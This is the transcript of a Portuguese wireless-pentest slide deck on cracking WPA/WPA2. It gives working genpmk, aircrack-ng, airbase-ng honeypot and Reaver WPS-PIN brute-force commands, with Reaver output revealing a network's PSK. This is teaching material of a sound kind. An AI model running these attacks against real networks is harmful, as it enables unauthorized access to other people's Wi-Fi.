WPA-WPA2
-
Upload
ronaldoejessica-costa -
Category
Documents
-
view
18 -
download
5
description
Transcript of WPA-WPA2
![Page 1: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/1.jpg)
Wireless Pentest
WPA & WPA2
![Page 3: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/3.jpg)
Wireless Protected Access
![Page 4: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/4.jpg)
![Page 5: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/5.jpg)
![Page 6: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/6.jpg)
![Page 7: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/7.jpg)
![Page 8: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/8.jpg)
![Page 9: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/9.jpg)
![Page 10: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/10.jpg)
![Page 11: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/11.jpg)
![Page 12: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/12.jpg)
![Page 13: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/13.jpg)
![Page 14: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/14.jpg)
![Page 15: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/15.jpg)
Um pouco mais de teoria…
![Page 16: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/16.jpg)
![Page 17: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/17.jpg)
WPA - Pre-Shared Key
![Page 18: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/18.jpg)
WPA - Pre-Shared Key
![Page 19: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/19.jpg)
![Page 20: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/20.jpg)
![Page 21: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/21.jpg)
![Page 22: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/22.jpg)
![Page 23: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/23.jpg)
![Page 24: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/24.jpg)
![Page 25: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/25.jpg)
![Page 26: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/26.jpg)
Um pouco mais de teoria…
![Page 27: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/27.jpg)
Um pouco mais de teoria…
![Page 28: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/28.jpg)
Ataque WPA
![Page 29: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/29.jpg)
Ataque WPA
![Page 30: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/30.jpg)
Ataque WPA
![Page 31: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/31.jpg)
Ataque WPA
![Page 32: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/32.jpg)
Ataque WPA
![Page 33: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/33.jpg)
Decriptando WPA - PSK
![Page 34: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/34.jpg)
WPA2 - PSK
• Usa os mesmos princípios do WPA• A fraqueza é baseada na frase escolhida• Mais nada a ser dito !!!!!• Procedimento igual ao anterior
![Page 35: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/35.jpg)
Acelerando o processo de Cracking
• Nós podemos pré-calcular a PMK para um dado SSID e uma wordlist usando a ferramenta genpmk
• genpmk -f /pentest/passwords/wordlists/darkc0de. lst -d PMK-Wireless-Lab -s "Wireless Lab“
• Vamos criar uma rede WPA-PSK com a senha skysign e capture o WPA-handshake desta rede
![Page 36: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/36.jpg)
Acelerando o processo de Cracking
![Page 37: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/37.jpg)
Meça o tempo levado com aircrack e compare…
![Page 38: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/38.jpg)
Usando PMK com aircrack
![Page 39: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/39.jpg)
Pyrit para sistemas MultiCPU
![Page 40: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/40.jpg)
Como o Reaver funciona?
• Explora a vulnerabilidade no WPS – Wi-Fi Protected Setup (WPS)• Força bruta em PIN’s para relevar as senhas do WPA ou WPA2• Leva de 4 a 10 horas• Não funciona em todos os AP’s
![Page 41: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/41.jpg)
Crackeando via Reaver1)airmon-ng start wlan02) airodump-ng mon0No outro terminal3) root@bt:~# reaver -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -vv
Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from 34:08:04:C0:B6:4E[+] Switching mon0 to channel 11[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)[+] Trying pin 12345670[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[!] WARNING: Receive timeout occurred[+] Sending WSC NACK[!] WPS transaction failed (code: 0x02), re-trying last pin[+] Trying pin 12345670[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message
![Page 42: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/42.jpg)
Crackeando via Reaverroot@bt:~# reaver -S -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -v
Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from 34:08:04:C0:B6:4E
[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)[+] Trying pin 12345670
[+] Trying pin 00005678[+] Trying pin 01235678[+] Trying pin 11115670[+] Trying pin 22225672[+] Trying pin 33335674[+] 0.05% complete @ 2012-05-07 20:43:57 (3 seconds/pin)[+] Trying pin 44445676[+] Trying pin 55555678[+] Trying pin 66665670[+] Trying pin 77775672[+] Trying pin 88885674[+] 0.10% complete @ 2012-05-07 20:44:14 (3 seconds/pin)[+] Trying pin 99995676[+] Trying pin 00015677[+] Trying pin 00025676[+] Trying pin 00035675
![Page 43: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/43.jpg)
Crackeando via Reaver• root@bt:~# reaver -S -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -vv -p 22838353
Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Switching mon0 to channel 11[+] Waiting for beacon from 34:08:04:C0:B6:4E[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)
[+] Trying pin 22838353[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message
[+] Received M3 message[+] Sending M4 message[+] Received M5 message[+] Sending M6 message[+] Received M7 message[+] Sending WSC NACK[+] Sending WSC NACK[+] Pin cracked in 3 seconds[+] WPS PIN: '22838353'[+] WPA PSK: 'DECADA1234'[+] AP SSID: 'multipinguim-2'[+] Nothing done, nothing to save.
![Page 44: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/44.jpg)
Conectando a uma rede WPAwpa-supp.conf
![Page 45: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/45.jpg)
Conectando a uma rede WPA
![Page 46: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/46.jpg)
Cracking AP-less WPA Personal
• Para fazermos um crack no WPA precisamos do 4 handshake:– Authenticator Nounce, Supplicante Nounce, Authenticator MAC, Supplicant
MAC.– Só que para este ataque não precisamos de todos estes pacotes:
• Ou pacote 1 & 2 ou pacotes 2 & 3
• Para crackear precisamos então do WPA-PSK honeypot para então ele conectar-se, somente precisamos da msg 1 e msg 2.
• Não precisamos saber nenhuma frase secreta ;-)
![Page 47: WPA-WPA2](https://reader034.fdocumentos.com/reader034/viewer/2022051017/55cf9146550346f57b8c3236/html5/thumbnails/47.jpg)
Cracking AP-less WPA Personal
1) Configurando nosso honeypot airbase-ng -c 3 -a <AP> -e “Wireless Lab” -W 1 -z 2 mon0
2) Iniciamos o airodumpairodumo-ng -c 3 –bssid <AP> --write sem-AP-WPA-cracking mon0
3) Volte a tela do airbase e observe os clientes se associando4) Volte a tela do airodump e veja se pegou o WPA Handshake5) Rode o aircrack agoraaircrack-ng -w wordlist.txt -b <AP> sem-AP-WPA-cracking-01.cap